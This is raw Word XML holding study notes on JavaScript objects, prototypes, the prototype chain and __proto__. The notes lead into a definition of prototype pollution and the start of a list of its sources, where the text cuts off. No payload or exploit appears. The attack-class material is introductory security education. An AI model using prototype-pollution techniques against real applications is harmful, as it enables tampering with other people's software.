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0798A" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>What is an object in JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBB888" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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const user =  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E33DA9" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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username: "wiener",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1206F" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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userId: 01234,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F062A52" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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exampleMethod: function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92907C" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// do something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDD943" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2F312" w14:textId="60904030" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB5CF6" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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</w:p>
    <w:p w14:paraId="76FC1BB7" w14:textId="2E859151" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Access the properties of an object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCE6D22" w14:textId="77777777" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>user.username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// "wiener"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C8696" w14:textId="41AFAB6C" w:rsidR="00424793" w:rsidRPr="000477D2" w:rsidRDefault="00424793" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>user['userId</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">']   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// 01234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B501678" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D109EFA" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>What is a prototype in JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EF792" w14:textId="343D25E5" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Every object in JavaScript is linked to another object of some kind, known as its prototype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E393A4" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EA4791" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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let myObject = {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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};</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37C869A2" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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Object.getPrototypeOf(myObject);    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E892B51" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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</w:p>
    <w:p w14:paraId="0F4F9680" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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let myString = "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B4D5854" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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Object.getPrototypeOf(myString);    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// String.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614298AF" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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</w:p>
    <w:p w14:paraId="52E84950" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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let myArray = [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="345176CD" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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Object.getPrototypeOf(myArray);</w:t>
      </w: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ab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Array.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447702A" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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</w:p>
    <w:p w14:paraId="33A6BEFE" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E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let myNumber = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F4F67B2" w14:textId="1EF9F7E8" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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Object.getPrototypeOf(myNumber);    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Number.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1238E542" w14:textId="2BBFBD24" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C7CF56" w14:textId="17FCF78D" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Objects automatically inherit all of the properties of their assigned prototype, unless they already have their own property with the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB1ACB2" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C97E3E" w14:textId="77777777" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00C3716E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>How does object inheritance work in JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78BD33" w14:textId="77777777" w:rsidR="00012598" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Whenever we reference a property of an object, the JavaScript engine first tries to access this directly on the object itself. If the object doesn't have a matching property, the JavaScript engine looks for it on the object's prototype instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A1A46" w14:textId="7CDB848B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C4FB619" wp14:editId="6F07F889">
            <wp:extent cx="1326160" cy="1884898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5609" cy="191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F47E" w14:textId="77777777" w:rsidR="00012598" w:rsidRPr="000477D2" w:rsidRDefault="00012598" w:rsidP="00012598">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">The prototype </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0147F9D8" w14:textId="50470F2B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="511DCE7E" wp14:editId="599F14CD">
            <wp:extent cx="3840733" cy="232807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2418" cy="235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947E" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143D3CCF" w14:textId="037796EF" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The prototype of Object.prototype is null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE609B8" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAE942E" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Accessing an object's prototype using __proto__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69614901" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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username.__proto__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611A300" w14:textId="543A95FC" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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username['__proto__']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225729A3" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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username.__proto__                        </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// String.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E50A6A" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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username.__proto__.__proto__              </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD9350" w14:textId="61CD40D3" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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username.__proto__.__proto__.__proto__    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6C2CE" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modifying prototypes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D8C76" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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String.prototype.removeWhitespace = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257253B3" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// remove leading and trailing whitespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B531EF" w14:textId="2E01C2C9" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9238A" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7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let searchTerm = "  example </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E7F815F" w14:textId="2587BA46" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE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searchTerm.removeWhitespace();    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// "example"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301D57C" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECBD289" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>What is prototype pollution?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4B4A4" w14:textId="77777777" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="005244C7" w:rsidP="005244C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Attacker adds arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE76F55" w14:textId="06859B55" w:rsidR="005244C7" w:rsidRPr="000477D2" w:rsidRDefault="00621E60" w:rsidP="005244C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="005244C7" w:rsidRPr="000477D2">
          <w:rPr>
            <w:color w:val="55ACEE"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005244C7" w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Prototype pollution sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1052C" w14:textId="4BC1BF64" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User-controllable input that enables us to add arbitrary properties to global prototypes. Common sources are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38202FDE" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430A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2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
